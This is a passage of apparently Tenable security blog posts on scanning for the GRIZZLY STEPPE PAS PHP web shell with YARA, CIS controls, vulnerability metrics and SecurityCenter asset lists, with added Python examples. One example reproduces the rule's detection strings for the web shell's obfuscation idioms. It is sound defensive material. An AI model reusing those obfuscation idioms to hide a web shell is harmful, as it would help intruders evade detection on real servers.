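The PAS rule above is unusual in relying on exact occurrence counts (#cookie == 2, #isset == 3) and a narrow filesize window. The following added Python example (not from the Joint Analysis Report or from Tenable) evaluates that condition the way YARA would, over a constructed, inert fixture, to show how tightly the rule is fitted to the one sample it was written from: one extra isset or a few kilobytes of padding and it no longer fires, which is worth knowing before treating a clean scan as conclusive.

```python
import re

# The strings of the PAS_TOOL_PHP_WEB_KIT rule above. Plain strings match
# literally; $base64decode is a regex (the same syntax works in Python's re).
PAS_STRINGS = {
    "php": b"<?php",
    "base64decode": re.compile(rb"\='base'\.\(\d+\*\d+\)\.'_de'\.'code'"),
    "strreplace": b"(str_replace(",
    "md5": b".substr(md5(strrev(",
    "gzinflate": b"gzinflate",
    "cookie": b"_COOKIE",
    "isset": b"isset",
}


def string_counts(data):
    """What YARA's #name evaluates to for every $name: its number of occurrences."""
    counts = {}
    for name, pat in PAS_STRINGS.items():
        rx = pat if hasattr(pat, "search") else re.compile(re.escape(pat))
        counts[name] = len(rx.findall(data))
    return counts


def pas_rule_fires(data):
    """The rule's condition, evaluated exactly as written: a 20-22 KB size window
    (YARA's KB is 1024 bytes), exactly two _COOKIE and exactly three isset
    occurrences, and every string present at least once ('all of them')."""
    counts = string_counts(data)
    size_ok = 20 * 1024 < len(data) < 22 * 1024
    return (size_ok and counts["cookie"] == 2 and counts["isset"] == 3
            and all(n > 0 for n in counts.values()))


def build_fixture(extra_isset=0, size=21 * 1024):
    """Constructed, inert test fixture (hypothetical): a PHP comment carrying each
    rule string with the multiplicity the rule expects, padded to `size` bytes.
    It is not the PAS kit and does nothing if executed."""
    body = (
        b"<?php\n/* constructed fixture for PAS_TOOL_PHP_WEB_KIT:\n"
        b"='base'.(8*8).'_de'.'code'\n(str_replace(\n.substr(md5(strrev(\n"
        b"gzinflate\n_COOKIE _COOKIE\nisset isset isset\n"
        + b"isset\n" * extra_isset
        + b"*/\n"
    )
    pad = b"/*" + b"A" * (size - len(body) - 4) + b"*/"
    return body + pad


if __name__ == "__main__":
    print("exact fixture     :", pas_rule_fires(build_fixture()))
    print("one more isset    :", pas_rule_fires(build_fixture(extra_isset=1)))
    print("same file at 23 KB:", pas_rule_fires(build_fixture(size=23 * 1024)))
```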

    Tenable’s YARA pattern detection

    Last year Tenable released SecurityCenter functionality to look for malicious files based on textual and binary patterns as defined by a YARA rule. You can use this functionality to detect the malicious PAS PHP web shell identified in the Joint Analysis Report on Windows systems. Here is a sample scan based on the GRIZZLY STEPPE YARA rule:

    Create a Yara scan policy

    1. Click Scans -> Policies -> Add.
    2. Select Malware Scan.
    3. Enter a scan name.
    4. Click Malware and enable File System Scanning.
    5. Select the desired Directories and upload the Yara Rules File.
    6. Click Submit.
    7. Create and run a scan using the new policy.

    YARA scan in SecurityCenter

    You can also run a similar YARA scan in Nessus®. Refer to Threat Hunting with YARA and Nessus for instructions on creating a YARA scan in Nessus®.

    Suspicious IP/DNS event analysis with SecurityCenter

    In addition to the YARA rule, the Joint Analysis Report also included IP addresses and DNS names tied to malicious actors related to the GRIZZLY STEPPE campaign. While many false positives have been reported with these IP addresses and DNS names, you may still want to scan for them, or use newer, more reliable sources if they become available. Using SecurityCenter, you can define a custom Watchlist asset list to look for any events within your organization which are tied to these suspicious IP addresses as follows:

    Create a new asset list

    1. Click Assets -> Add -> Custom -> Watchlist.
    2. Create a file containing the IP addresses.
    3. Assign a name to the asset list, such as Grizzly Steppe IPs.
    4. Click Submit.

    Analyze events

    1. Click Analysis -> Events.
    2. Configure Event Analysis to include Destination Asset and Source Asset.
    3. Select Grizzly Steppe IPs as the asset to watch.
    4. Select a timeframe of events to monitor.
    5. Click Apply All, and review the events.

    SecurityCenter Event Analysis



    Follow similar steps to create assets for malicious DNS names, with the caveat that you may get many false positives.

    In addition to Watchlists, you can also add custom IPs, URLs or domains to the built-in threat detection in LCE®. This is done by creating custom files in the LCE plugins directory. Refer to the Tenable Community Discussion for more details.

    Protecting your systems

    Review activity to and from any suspicious IP addresses related to GRIZZLY STEPPE, especially if it appears to be performing a vulnerability scan. For any public facing Windows systems, run a scan with the YARA signature listed above and review any activity that might indicate a compromise.



    Thanks to Rich Walchuck, John Chirhart and Andrew Flick for their contributions to this blog.

    How Solid is Your Security Framework Foundation?

    A recent study from Dimensional Research, sponsored by Tenable and the Center for Internet Security, titled, “Cybersecurity Frameworks and Foundational Security Controls,” revealed that 95 percent of organizations face technological and business challenges when implementing leading security frameworks: the NIST Framework for Improving Critical Infrastructure Cybersecurity, ISO 27001/27002, CIS Critical Security Controls, and PCI.

    95% of global organizations face impediments when implementing security frameworks

    The study tallied survey responses from more than 300 U.S. and European IT security decision makers. Respondents from organizations of all sizes across key industries were polled to better understand the adoption and maturity of cybersecurity frameworks and their underlying security controls.

    According to survey data, respondents cited shortages in trained staff (57 percent), a lack of necessary tools to automate controls (40 percent) and inadequate budget (39 percent) as the top three challenges in cybersecurity framework adoption. Other factors noted as inhibiting the successful implementation of security controls included lack of prioritization, support from management and reporting capabilities.

    Graph: Impediments in implementing cybersecurity frameworks

    A focus on foundational controls

    The research drilled into adoption of the five controls designated by the CIS as Foundational Cyber Hygiene. These foundational controls, a subset of the 20 CIS Critical Security Controls for Effective Cyber Defense, are an integral part of virtually all security frameworks, including the NIST Cybersecurity Framework and ISO 27001/27002. On average, only about 50% of organizations have implemented the foundational controls and related sub-controls:

    1. Inventory of Authorized and Unauthorized Devices
    2. Inventory of Authorized and Unauthorized Software
    3. Secure Configurations for Hardware and Software on Mobile Devices, Laptops, Workstations, and Servers
    4. Continuous Vulnerability Assessment and Remediation
    5. Controlled Use of Administrative Privileges

    Only 6% of surveyed organizations have implemented the 5 foundational CIS controls

The lack of adoption can be partially explained by timing. More than half of the organizations polled have been on their control adoption journey for one year or less. Even so, it is somewhat surprising and disconcerting that only six percent of surveyed organizations have thoroughly implemented the five foundational controls. Lacking these controls, organizations cannot help but struggle with preventing, detecting and responding to cyber threats and vulnerabilities.

    How do you stack up?

    Take our mini survey to see how your control status compares to similar sized organizations.

    Frameworks mini-survey title screen

    Get expert advice

    To help you realize the benefits of adopting the foundational CIS controls, join Tony Sager, Senior VP and Chief Evangelist with CIS, and me at 2 p.m. ET on January 18, 2017 for Achieving Effective Cyber Hygiene with Critical Controls 1-5. This webinar will cover the following topics:

    • Brief review of the latest survey findings on foundational control adoption
    • Quantitative and qualitative benefits of foundational control adoption
    • Adoption barriers and best practices for SMB, mid-market and enterprise organizations
    • Advice for front line infosec practitioners and leaders
    • Answers to your specific questions during a live Q&A

    Please join us for this opportunity to hear and learn from a leading expert. Your questions and comments are welcome. We look forward to your participation.

    Use the Right Security Metrics in the Right Way


    Metrics are an important element of making effective business decisions. When it comes to security, metrics can help you determine the performance of current security tools and processes, and identify weaknesses or areas to be improved. Security metrics can also help you identify and thwart an ongoing attack against your network or data. That assumes, however, that you’re looking at the right metrics and acting on the information appropriately.

    Wrong metrics yield wrong results

    Consider the Titanic, and let’s assume for a minute that metric data was being collected and reported, ostensibly to ensure the ship safely navigates through a sea of icebergs. How valuable would it be for the captain to receive a report detailing the number of deck chairs on the ship, along with how many of them were damaged and in need of repair? Zero.

    Capture and analyze the right information

    Organizations need to have tools and processes in place that enable them to capture and analyze the right information. From a security perspective, it helps to work backward. Consider what a successful attack looks like, and the events and activities that lead up to it. That way you can identify the appropriate indicators of compromise that should trigger an immediate response.

    Right metrics, wrong process

    Let’s go back to our Titanic example. It would obviously have been much more valuable for the captain of the Titanic to receive a report detailing the icebergs that had been identified in the path of the ship, along with a series of recommendations for how to adjust navigation to avoid them. If the captain did not regularly view the metrics reports though, and if there was no process in place to separate important information about icebergs from irrelevant information like the number of deck chairs, the results would be the same.

    Separate important information from irrelevant information

    Another example of having the right information with the wrong process was the data breach of U.S. retail chain Target in late 2013. A 2014 article explains, “Target confirmed Friday that the hack attack against the retailer's point-of-sale (POS) systems that began in late November triggered alarms, which its information security team evaluated and chose to ignore.”

    Differentiate critical alerts from trivial alerts

    In other words, Target had the right security in place, and the tools to generate the alerts necessary to make security personnel aware that a critical event was happening, but the process for differentiating critical alerts from trivial alerts and responding appropriately to that information was flawed.

    Doing metrics the right way

    The Titanic examples illustrate that there is a right way and a wrong way to do metrics. First, you have to be focusing on the right metrics—gathering data that actually matters for the important decisions you need to make. Second, you must be able to separate the signal from the noise and have a process in place to ensure that critical and/or timely information is seen and acted upon appropriately.

    Respond appropriately

    Not all metrics or the processes for handling them need to be about ongoing attacks or urgent incident response. If the iceberg threat was addressed, the captain of the Titanic might still be interested in the current state of deck chair repairs. Gather and report data on as much as you can. Just make sure you can differentiate trivial data from important data—that you can separate actionable intelligence from general information —and ensure that you have the processes in place to respond appropriately to the metrics that matter most.

    More information

    Recently, Tenable sponsored publication of the ebook, Using Security Metrics to Drive Action: 33 Experts Share How to Communicate Security Program Effectiveness to Business Executives and the Board. The ebook is a compilation of essays by security officers who share their best practices for implementing an effective security metrics program. Download your free copy for a gold mine of advice.


    Vulnerability Management Metrics


    Everyone is always talking about metrics. Just like the 1970s TV show that quipped, “Marcia, Marcia, Marcia,” analysts today are stressing Metrics, Metrics, Metrics. But which security metrics are important, and how can we tell the best metrics from the not-so-useful ones? When a CISO meets with other C-level executives and board members, the CISO must have a clear expectation of the useful metrics for that organization. Additionally, the CISO must be able to communicate the metrics in story or narrative form, helping the executives fully understand how the metrics affect their business and the overall risk to the organization.

    Core vulnerability metrics

    Each organization has different security metrics that are important to their operations and business. However, there are several vulnerability metrics that are common across industries and should be considered when discussing security issues with your C-level executives.

    • Time to Detect - This metric is the delta from when a vulnerability is created until the time the vulnerability is detected: for example, from when a user installs a vulnerable application until the time the vulnerable application is discovered.
    • Time to Containment or Mitigation - This metric indicates how quickly attacks are contained or how long mitigation of a vulnerability takes.
    • Baseline Metrics - Establishing a baseline of normal behavior is important before developing a full metrics program. This metric provides a clear understanding of what normal is, and how to understand deviations from normal.
    • Patch Management Efficiency - This metric contributes to the understanding of patch cycles and remediation efforts. This metric is different from the Time to Containment or Mitigation because these efforts are based on regular vendor patch release schedules, such as Microsoft’s Patch Tuesday.
    • System Hardening Metric - This metric provides insight into the proper configuration of operating systems, applications, and network infrastructure devices.

    How SecurityCenter can help

    Tenable SecurityCenter® provides continuous network monitoring to identify vulnerabilities, reduce risk, and ensure compliance. When using active and agent-based scanning, SecurityCenter can analyze each system and discover the operating system, installed applications, miscellaneous configuration settings, and the vulnerabilities associated with each risk factor. SecurityCenter also provides an easy-to-understand and easy-to-maintain method of communicating the metrics associated with these identified risks and vulnerabilities. Assurance Report Cards, dashboards, and reports all help to communicate the metrics to different levels of information consumers. SecurityCenter can create simple-to-understand charts and graphs for executive-level consumption, and at the same time provide the detail needed for the IT operations team.

    When preparing presentations for executive boards, CISOs need a wide range of data sources. SecurityCenter has over 350 dashboards and 400 reports to assist with the collection of metrics and to answer a CEO’s question, “How secure are we?” For this blog post we have selected 5 SecurityCenter dashboards that address these metrics. These vulnerability metrics are often identified by security experts as foundational to a solid security program. (For more information about these metrics, see Using Security Metrics to Drive Action: Security Metrics That Tell a Story to the Board, an insightful ebook published by Mighty Guides, Inc. with Tenable.)

    Five SecurityCenter dashboards for vulnerability management


    Time to Detect

    Time to Detect is an interesting and vital metric for answering the question, “Are we secure?” This metric can lead to a false sense of security if the detection time is not highly scrutinized and verified using several methods. For example, an application can have a zero-day vulnerability - a vulnerability that has not been identified by the vendor - for several years in some cases. Does not knowing about the vulnerability make your company more secure? The answer is no; not knowing about a vulnerability will not make you more secure. You cannot mitigate a risk unless you are aware of it, but you can harden systems, networks, and firewalls to lessen the likelihood of compromise. In the Executive Vulnerability Metrics dashboard, there are 4 matrices that correlate vulnerabilities from the date the vulnerability is published to the time the vulnerability is identified by SecurityCenter, the time a patch is available, and the time the risk is mitigated. These matrices provide the numbers that executives need to understand and properly assess risk to the organization.

    Time to Containment or Mitigation

    Having the ability to report on how efficient your mitigation program is can be critical to communicating the effectiveness of a risk mitigation strategy. SecurityCenter contains a database solely for this purpose. During the scanning process, SecurityCenter compares the scan results of a host to data stored in the cumulative database. Any vulnerability that is not present in the latest scan is considered mitigated. During this correlation process, there are two dates that are recorded:

    • Days to Mitigate - Tracks the number of days since a vulnerability was moved to the mitigated database
    • Days Since Mitigation - Tracks the number of days since a vulnerability was mitigated

    Using these two filters, you can easily gain an understanding of how your patch management and risk mitigation programs are functioning. Using Days to Mitigate, you can determine the patch rate within your organization, which speaks directly to Time to Containment. The Historic Patch Mitigation Status dashboard presents counts of mitigation and containment metrics. The data in this dashboard helps answer the question, “How long was this vulnerability a known threat?” If your patch cycle is every 30 days, then your patch rate should always be less than 30 days. Use these metrics to show how efficiently the patch program is working, or to show a need for more staff or additional resources.
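The bookkeeping and metrics described above (Time to Detect, the cumulative-versus-mitigated comparison, Days to Mitigate, Days Since Mitigation, the patch rate against a 30-day cycle, and the patch-available date) worked through in Python as an added example. This is not SecurityCenter's code; the `Finding` record layout, the field names and the sample findings are constructed assumptions for illustration.

```python
from dataclasses import dataclass
from datetime import date
from statistics import mean
from typing import Dict, List, Optional, Set

CYCLE_DAYS = 30  # the 30-day patch cycle the post uses as its yardstick


@dataclass
class Finding:
    """One vulnerability on one host. Field names are assumptions, not SecurityCenter's schema."""
    host: str
    plugin_id: int
    published: date                    # date the vulnerability was made public
    first_seen: date                   # date the scanner first identified it on this host
    patch_available: Optional[date] = None
    mitigated: Optional[date] = None   # set when the finding moves to the mitigated database


def time_to_detect(f: Finding) -> int:
    """Time to Detect: days from publication until the finding was identified on the host."""
    return (f.first_seen - f.published).days


def days_to_mitigate(f: Finding) -> Optional[int]:
    """Days the finding stayed open before it moved to the mitigated database."""
    return (f.mitigated - f.first_seen).days if f.mitigated else None


def days_since_mitigation(f: Finding, today: date) -> Optional[int]:
    """Days elapsed since the finding was mitigated."""
    return (today - f.mitigated).days if f.mitigated else None


def patch_lag(f: Finding) -> Optional[int]:
    """Days a vendor patch was available before the finding was mitigated."""
    if f.mitigated and f.patch_available:
        return (f.mitigated - f.patch_available).days
    return None


def reconcile(cumulative: List[Finding], latest_scan: Dict[str, Set[int]],
              scan_date: date) -> List[Finding]:
    """Compare the latest scan with the cumulative database: a finding whose host was scanned
    but whose plugin no longer fires is considered mitigated and moves out of `cumulative`.
    Hosts absent from the latest scan keep their findings (no evidence either way)."""
    newly_mitigated = []
    for f in list(cumulative):
        if f.host in latest_scan and f.plugin_id not in latest_scan[f.host]:
            f.mitigated = scan_date
            cumulative.remove(f)
            newly_mitigated.append(f)
    return newly_mitigated


def metrics(cumulative: List[Finding], mitigated_db: List[Finding], today: date,
            cycle_days: int = CYCLE_DAYS) -> dict:
    """Summarise the dashboard metrics as plain numbers an executive chart could be built from."""
    dtm = [days_to_mitigate(f) for f in mitigated_db]
    lags = [lag for lag in map(patch_lag, mitigated_db) if lag is not None]
    return {
        "open": len(cumulative),
        "mitigated": len(mitigated_db),
        "mean_time_to_detect": round(mean(time_to_detect(f) for f in cumulative + mitigated_db), 1),
        "patch_rate_days": round(mean(dtm), 1) if dtm else None,        # average Days to Mitigate
        "within_cycle_pct": round(100 * sum(d <= cycle_days for d in dtm) / len(dtm)) if dtm else None,
        "mean_patch_lag_days": round(mean(lags), 1) if lags else None,
        # open findings older than the patch cycle: the gaps the patch program has missed
        "overdue": sorted((f.host, f.plugin_id) for f in cumulative
                          if (today - f.first_seen).days > cycle_days),
    }


def sample_report():
    """Constructed scenario: a cumulative database, one finding mitigated earlier, and the
    latest scan on 2017-01-20 in which app01 was not scanned at all."""
    today = date(2017, 1, 20)
    cumulative = [
        Finding("web01", 100, date(2016, 11, 1), date(2016, 12, 1), date(2016, 11, 15)),
        Finding("web01", 101, date(2017, 1, 8), date(2017, 1, 10)),
        Finding("db01", 100, date(2016, 11, 1), date(2016, 12, 5), date(2016, 11, 15)),
        Finding("db01", 102, date(2016, 10, 1), date(2016, 12, 5)),
        Finding("app01", 103, date(2016, 12, 1), date(2016, 12, 20)),
    ]
    mitigated_db = [
        Finding("web01", 104, date(2016, 12, 15), date(2016, 12, 20), mitigated=date(2017, 1, 5)),
    ]
    latest_scan = {"web01": {101}, "db01": {100, 102}}   # plugin IDs still firing per host
    newly = reconcile(cumulative, latest_scan, today)     # web01/100 no longer fires
    mitigated_db.extend(newly)
    return metrics(cumulative, mitigated_db, today), newly


if __name__ == "__main__":
    report, newly = sample_report()
    for key, value in report.items():
        print(f"{key}: {value}")
```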

    Baseline Metrics

    Another important question you may be asked is, “What is normal?” When analyzing network traffic patterns, disk usage, or database storage, the base metrics can be very straightforward to calculate. However, when calculating the base metric for vulnerability analysis, the baseline is much more subjective and reflects how much risk you are willing to accept.

    Some organizations set the policy for the baseline as not having any vulnerabilities over a certain CVSS score, while others use the difference between credentialed and non-credentialed scans. Whichever metric your organization chooses, make sure to have the metric clearly defined and achievable. Regardless of the metric, the Vulnerabilities by Plugin Family dashboard is a good place to start your analysis. This dashboard provides a breakdown per plugin family of all the vulnerabilities discovered. Each of the components provide a breakdown using Mitigated, Unmitigated, CVSS Score, Exploitable, and Patch Availability. Use this information to present a current risk assessment based on different categories and operating systems.

    Patch Management Efficiency

    Another common metric is the Patch Management Efficiency metric. By tracking Patch Management Efficiency, you can justify manpower, show mitigation actions, and track many common business metrics. Companies like Microsoft that report vulnerabilities on a regularly scheduled basis provide CISOs with a set of changes for planning purposes. However, other companies that release patches at random intervals make the reporting of metrics more difficult. Both methods have positive and negative effects, but you must be able to report the metric accurately and convey that the host risk is reduced. The Mitigated Patch Rates dashboard provides a trend analysis of vulnerabilities discovered over 3 months, and a breakdown of vulnerabilities based on operating systems and CVSS score.

    System Hardening Metric

    System hardening is a challenging effort to say the least. When hardened configurations are applied, certain applications will not work correctly; and yet the threat of not hardening creates high risk from zero day vulnerabilities. Thankfully, there are organizations such as the Center for Internet Security (CIS), National Institute of Standards and Technology (NIST), and others to assist with hardening standards. SecurityCenter has the ability to perform configuration audits on several systems and map the configuration settings to match standards. The Compliance Summary dashboard provides a simple view of how an organization is meeting the support standards.

    Wrapping Up

    Reporting metrics that are understandable to the business is a difficult and time-consuming task. SecurityCenter is a great place to start when communicating risk to executives. Using these 5 dashboards along with other more business-specific dashboards, your organization can be more secure and your executives will be better informed.

    Favorite SecurityCenter Asset Lists


    Do you want better insights into the systems you are scanning? One of the best ways to power up a SecurityCenter® analysis can come by tailoring asset lists. The assets can provide more understanding and productivity as you craft new lists of your inventory. For example, you can craft them by vendor, location, severity of vulnerability, software installed, or many other criteria. In this blog, I will highlight some unique lists formulated by such characteristics as new hosts, age of vulnerability, processor, reboot, unsupported software, sniffing, and vendor model number.

    SecurityCenter asset lists

    Dynamic and combination asset lists

    In this how-to blog, I will discuss the two most powerful types of asset lists: dynamic and combination. With dynamic lists, you can make rules that search through repository information in SecurityCenter. The breadth and level of detail in the repositories can be surprising; you can see that in the examples below. These lists are called dynamic because as the repositories receive new information, SecurityCenter automatically updates the list.

    The inner workings of dynamic asset lists come from the fields which are derived from the information in the repositories. Examples of those fields include Severity, Plugin Id, or Days Since Discovery and others. Some of the more unique searching can be implemented with operands like contains the pattern, POSIX regex, and Perl compatible regex. (See the Equipment-Specific asset list below.)

    One of the least understood parts of assets lists is that when multiple rules are included, each rule generates a separate request. This makes the results a little looser than most people think. (See the Over 30 Day Exploitable Vulnerabilities asset list below.)

    You can build combination asset lists out of existing asset lists with the operands AND, OR, and NOT. This enables you to quickly merge lists (like all systems in two data centers) or pick out the overlap of two lists (like only the Windows hosts in the internet-facing portion of the network, the DMZ). Entering multiple asset lists has shortcuts (see the Sniffed But Not Scanned asset list below).

    Part 1: Favorite customized asset lists

    I teach classes for Tenable almost every week. Last year, while teaching at the state of Oregon, I was quite impressed with some of the asset lists that Steven Ketchum had put together. Here are a few favorites and how to set them up.

    New Hosts asset list

    In many enterprises—like data centers—you need to detect when new equipment shows up on the network. The New Hosts dynamic asset list uses daily, lightweight Nessus® scans or Passive Vulnerability Scanner® sensors to identify the new hosts. The list combines two plugins (Plugin ID 19506: Nessus Scan Information, and Plugin ID 12: PVS Hosts) with the Vulnerability Discovered filter.

    You can also use this logic to trigger an alert which sends a report and performs a vulnerability scan of the new devices.

    New Hosts asset list

    Over 30 Day Exploitable Vulnerabilities asset list

    The Over 30 Day Exploitable Vulnerabilities asset list identifies hosts with the most urgent vulnerabilities that are in need of patching. The thirty day filter picks up hosts that are not fixed by the monthly patch cycle, which helps you find gaps in your patching processes. Second, the list filters to show the more urgent vulnerabilities—those of higher severity on the CVSS scale and which have publicly known exploits. This asset list needs a shorter name though; how about OTDEV?

    Over 30 Day Exploit Vulnerabilities

    Advanced tip: Since each rule will be a separate search, the results can be a little broader than intended. You can achieve tighter logic with a combination asset list built on these three rules.

    Retire Hosts asset list

    With the Retire Hosts asset list, you can sort out your server and workstation inventory. For example, pick out your older servers which have x86 (32-bit) processors (as compared to 64 bit in newer systems). Then, target the older boxes in a hardware retirement program.

    Retire Hosts asset list

    Unsupported Adobe asset list

    The Unsupported Adobe asset list works with workstations and servers to identify hosts with outdated or unsupported Adobe Acrobat and Reader software. Cleaning up Adobe removes a well-known threat vector. The list also helps you provide the executive team with accurate counts for budgeting software replacement.

    Unsupported Adobe asset list

    Tenable also provides an asset list template called Unsupported Software that identifies deprecated software from many vendors and not just Adobe. The following screenshot shows Microsoft, Java, VMWare, Flash and others.

    Unsupported Software asset list

    Systems Not Recently Rebooted asset list

    Nessus scans can detect when a system last rebooted. One example of where this helps is with patching Windows systems: some Windows patches do not take effect until the system reboots, and sometimes the reboot doesn’t occur. This asset list helps you find systems that were patched but are still vulnerable.

    Systems Not Recently Rebooted asset list

    Sniffed But Not Scanned asset list

    Does your Passive Vulnerability Scanner see hosts in your network that your scans are missing? The Sniffed But Not Scanned list helps verify inventory and find overlooked systems. This is a combination list built from two templates which have already been added to SecurityCenter.

    Sniffed But Not Scanned asset list

    Tip: The Combination field, where you enter the asset lists, is interactive. For example:

    1. Type the letters “pa” and SecurityCenter will filter the existing asset lists.
    2. Position the cursor on Systems Discovered Passively, press the Enter key and then the spacebar.
    3. Choose the operand AND by pressing the Enter key followed by the spacebar.
    4. Press the Enter key to select NOT, then tap the spacebar once.
    5. Type “sc”, move the highlight, and press Enter to select Systems that have been Scanned.
    6. Click Submit to save the new list.

    With a little practice, this interface helps you build combination asset lists much faster.

    Equipment-Specific asset list

    You can find specific types of equipment with Plugin ID 24270: Computer Manufacturer Information. With some regex filtering, you can search individual manufacturers and models. This plugin even reports the computer’s serial number.

    Note: When possible, include an asset list to limit the scope of the search. Plugin text searches are the most expensive with respect to CPU time.

    Equipment-Specific asset list

    Part 2: Favorite asset lists from templates

    The following asset lists are already predefined on your systems as templates. Many customers find these very helpful:

    • Windows Hosts, Linux Hosts: Commonly used for setting up groups. Also helpful in adding Credential Scan dashboards (Windows, Linux, and Cisco.)
    • Systems That Have Been Scanned: An essential list in working with inventory. How does this number compare with your current license count?
    • Systems With Software Inventory: This list shows which hosts have been scanned with full access. How big a difference do you find between this list and the previous list (scanned hosts)?
    • Bad Credentials: Which hosts had access issues during scans? Find them in the Credentialed dashboards, or set up an alert.
    • Anti-virus Current: Performs three checks: 1) that anti-virus is installed, 2) that it is running, and 3) that it has the latest signatures, which together verify a critical element of endpoint defenses. In a combination asset list, you can combine Systems That Have Been Scanned AND NOT Anti-Virus Current. This helps find systems with anti-virus problems that are ripe for compromise.
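An added illustration, not SecurityCenter's own code, of two points made in this post: why a multi-rule dynamic list that runs one search per rule can be looser than a single per-finding match (the Over 30 Day Exploitable Vulnerabilities list and its advanced tip), and how combination lists such as Systems Discovered Passively AND NOT Systems That Have Been Scanned, or Systems That Have Been Scanned AND NOT Anti-Virus Current, resolve over named host sets. The per-rule matching model, the rule predicates and all host and finding data are assumptions constructed for the example.

```python
from dataclasses import dataclass
from datetime import date
from typing import Callable, Dict, List, Set, Union

TODAY = date(2017, 1, 20)   # constructed reference date for the "over 30 day" rule


@dataclass
class Vuln:
    """One finding on one host (constructed sample data; not a SecurityCenter record)."""
    host: str
    plugin_id: int
    severity: str          # Low / Medium / High / Critical
    exploitable: bool      # a public exploit is known
    first_seen: date       # Vulnerability Discovered date


Rule = Callable[[Vuln], bool]

# The three OTDEV rules from the post, expressed as predicates on a finding.
OTDEV_RULES: List[Rule] = [
    lambda v: (TODAY - v.first_seen).days > 30,       # discovered more than 30 days ago
    lambda v: v.severity in ("High", "Critical"),      # higher CVSS severity
    lambda v: v.exploitable,                           # publicly known exploit
]


def per_rule_host_match(vulns: List[Vuln], rules: List[Rule]) -> Set[str]:
    """Assumed model of a multi-rule dynamic list: every rule is a separate search over the
    repository, and a host qualifies when each search returns *some* finding on it. The
    findings need not be the same one, which is what makes the result looser."""
    matched = [{v.host for v in vulns if rule(v)} for rule in rules]
    return set.intersection(*matched) if matched else set()


def per_finding_match(vulns: List[Vuln], rules: List[Rule]) -> Set[str]:
    """Tighter logic: a host qualifies only if a single finding satisfies all rules at once."""
    return {v.host for v in vulns if all(rule(v) for rule in rules)}


Expr = Union[str, tuple]


def combination_list(expr: Expr, lists: Dict[str, Set[str]]) -> Set[str]:
    """Evaluate a combination asset list built from named lists with AND, OR and NOT.
    Expressions are nested tuples, e.g. ("AND", "A", ("NOT", "B")). NOT is taken relative
    to every host that appears in any of the supplied lists."""
    if isinstance(expr, str):
        return set(lists[expr])
    universe = set().union(*lists.values())
    op, *args = expr
    if op == "NOT":
        return universe - combination_list(args[0], lists)
    left, right = (combination_list(a, lists) for a in args)
    if op == "AND":
        return left & right
    if op == "OR":
        return left | right
    raise ValueError(f"unknown operand {op!r}")


# Constructed sample repository.
SAMPLE_VULNS = [
    Vuln("web01", 100, "High", True, date(2016, 11, 15)),      # old, high, exploitable
    Vuln("web02", 101, "High", False, date(2016, 11, 15)),     # old and high, no exploit
    Vuln("web02", 102, "Medium", True, date(2017, 1, 15)),     # exploitable but new and medium
    Vuln("db01", 103, "Critical", True, date(2017, 1, 18)),    # critical and exploitable, but new
    Vuln("app01", 104, "Low", False, date(2016, 10, 1)),       # old but low and no exploit
]

# Constructed versions of three template lists named in the post.
SAMPLE_LISTS = {
    "Systems Discovered Passively": {"web01", "web02", "db01", "printer01"},
    "Systems That Have Been Scanned": {"web01", "web02", "db01", "app01"},
    "Anti-Virus Current": {"web01", "app01"},
}


def otdev_loose() -> Set[str]:
    return per_rule_host_match(SAMPLE_VULNS, OTDEV_RULES)


def otdev_tight() -> Set[str]:
    return per_finding_match(SAMPLE_VULNS, OTDEV_RULES)


def sniffed_but_not_scanned() -> Set[str]:
    return combination_list(("AND", "Systems Discovered Passively",
                             ("NOT", "Systems That Have Been Scanned")), SAMPLE_LISTS)


def missing_antivirus() -> Set[str]:
    return combination_list(("AND", "Systems That Have Been Scanned",
                             ("NOT", "Anti-Virus Current")), SAMPLE_LISTS)


if __name__ == "__main__":
    print("OTDEV, one search per rule:", sorted(otdev_loose()))      # web02 slips in
    print("OTDEV, one finding per host:", sorted(otdev_tight()))     # web01 only
    print("Sniffed but not scanned:", sorted(sniffed_but_not_scanned()))
    print("Scanned but anti-virus not current:", sorted(missing_antivirus()))
```

web02 qualifies under the per-rule model only because one old high-severity finding and a different new exploitable finding each satisfy a rule on their own.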

    Part 3: Which hosts?

    You may want to know which hosts are being referenced by an asset list. You’ll have to dig in to find that information. Start on the Assets page. For the asset list in question, click on the gear icon on the far right. Select View. Then in the Viewable IPs section, find the repository and click on the triangle. The host list appears.

    Hosts list

    Suggestions

    SecurityCenter doesn’t only have vulnerability information. You can build asset lists with other characteristics such as processor architecture, software status, and equipment model to meet business needs in managing your inventory. Lists can combine exploit information, risk severity, and vulnerability age to help you discover which boxes to patch first. You can also datamine forensics like reboot time to debug patching problems.

    Try these asset lists in your SecurityCenter and let us know what your favorite asset lists are. Which asset lists have been most helpful to you? Do you have a suggestion for an asset list template? Head on over to The Tenable Community to share your ideas.


    Thanks to Steve Ketchum, Oregon Department of Corrections, for his asset list suggestions, and contributions to this blog.

    Building Organizational Confidence in Cybersecurity


    Recently, Tenable Network Security, with research conducted by CyberEdge Group, announced some surprising results from their annual 2017 Tenable Network Security Global Cybersecurity Assurance Report Card. Tenable surveyed 700 security practitioners from nine countries and seven industry verticals to assess the overall confidence levels of information security professionals in detecting and mitigating organizational cyber risk. The biggest takeaway from the report is the overall confidence levels score of 70% (a C- grade), a drop of six points from the year before, reflecting the frustration IT security professionals are facing from the challenges of assessing and mitigating cyber risks across a constantly evolving threat landscape.

    Going from impact to solution

    Despite the feeling that no amount of defense may ever fully stem the rising tide, moving back into a realm of cybersecurity confidence is possible for most organizations. The key is to bridge the gap between common cybersecurity maturity models and organizational development concepts like Stage Theory.

    Stage Theory

    Stemming from the health and education industry sectors, Stage Theory is the idea that organizations pass through a series of stages as they change. The integration and growth of cybersecurity within organizations must become part of that evolution. According to Stage Theory, adoption of an innovation follows four steps, and strategies for promoting changes can be matched to points in that process.

    The four steps within Stage Theory are:

    1. Develop an awareness of a problem and plan possible solution innovations.
    2. Make a decision to adopt an innovation.
    3. Implement the innovation, which includes redefining it, and modifying organizational structures to accommodate it.
    4. Finally, fully institutionalize the innovation, making it part of the organization's ongoing activities.

    Cybersecurity Capability Maturity Model

    Cybersecurity maturity models, on the other hand, are a little more tactical and granular than organizational theories. The Cybersecurity Capability Maturity Model (CCMM) provides an introduction to the key activities organizations must implement within their IT security program from the perspective of three main areas: process and analytics, integrated governance, and enabling technology. It also includes three levels of maturity for each activity: limited, progressing or optimizing.

    Although the CCMM provides valuable information, actually executing the model takes extensive, ubiquitous, top-down executive sponsorship and support, as well as an organization willing to commit to the leg work of combining the organizational theory with maturity modeling.

